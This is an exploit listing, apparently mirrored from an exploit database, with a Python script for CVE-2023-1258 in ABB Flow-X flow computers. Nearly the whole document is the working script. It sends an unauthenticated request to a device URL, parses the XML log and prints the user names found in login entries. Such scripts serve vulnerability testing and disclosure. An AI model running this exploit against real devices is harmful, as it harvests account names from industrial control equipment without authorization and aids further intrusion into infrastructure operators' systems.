## https://sploitus.com/exploit?id=PACKETSTORM:173610
# Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information  
# Date: 2023-03-31  
# Exploit Author: Paul Smith  
# Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series  
# Version: ABB Flow-X all versions before V4.00  
# Tested on: Kali Linux  
# CVE: CVE-2023-1258  
  
  
#!/usr/bin/python  
import sys  
import re  
from bs4 import BeautifulSoup as BS  
import lxml  
import requests  
  
# URL to request, read from the first command-line argument when the module
# is loaded. Running the script without an argument raises IndexError here,
# before any request is made.
url = sys.argv[1]
  
  
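def dump_users():
    """Print every "User <name> logged in" entry found in the fetched log.

    Sends a single GET to the module-level ``url`` (the call passes no auth
    argument), parses the response body as XML and scans each ``<log>``
    element for a login message. Each printed line is a user name that the
    server returned to this request, which is the information exposure the
    file header tracks as CVE-2023-1258 (ABB Flow-X versions before V4.00
    are listed there as affected).

    An empty result only means no login entries were readable at this URL;
    it does not by itself show that the device is on a fixed release.

    Exits with status 1 when the server answers with anything other than
    HTTP 200.
    """
    # Bound the wait so an unreachable or filtered host cannot hang the run.
    response = requests.get(url, timeout=10)

    # Anything other than 200 is reported on stderr and ends the run with a
    # non-zero status, so callers and wrappers can tell failure from "no hits".
    if response.status_code != 200:
        print(
            'Status:', response.status_code,
            'Headers:', response.headers,
            'Error Response:', response.text,
            file=sys.stderr,
        )
        sys.exit(1)

    # Parse the XML body and look at each <log> element in turn.
    soup = BS(response.text, features="xml")
    login_pattern = re.compile('User (.*?) logged in')
    for entry in soup.find_all("log"):
        match = login_pattern.search(str(entry))
        if match:
            # group(0) is the whole "User ... logged in" phrase.
            print(match.group(0))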
def main():
    """Entry point: list the login entries exposed at the target URL once."""
    dump_users()
  
  
# Run only when executed as a script, not when imported.
if __name__ == "__main__":
    main()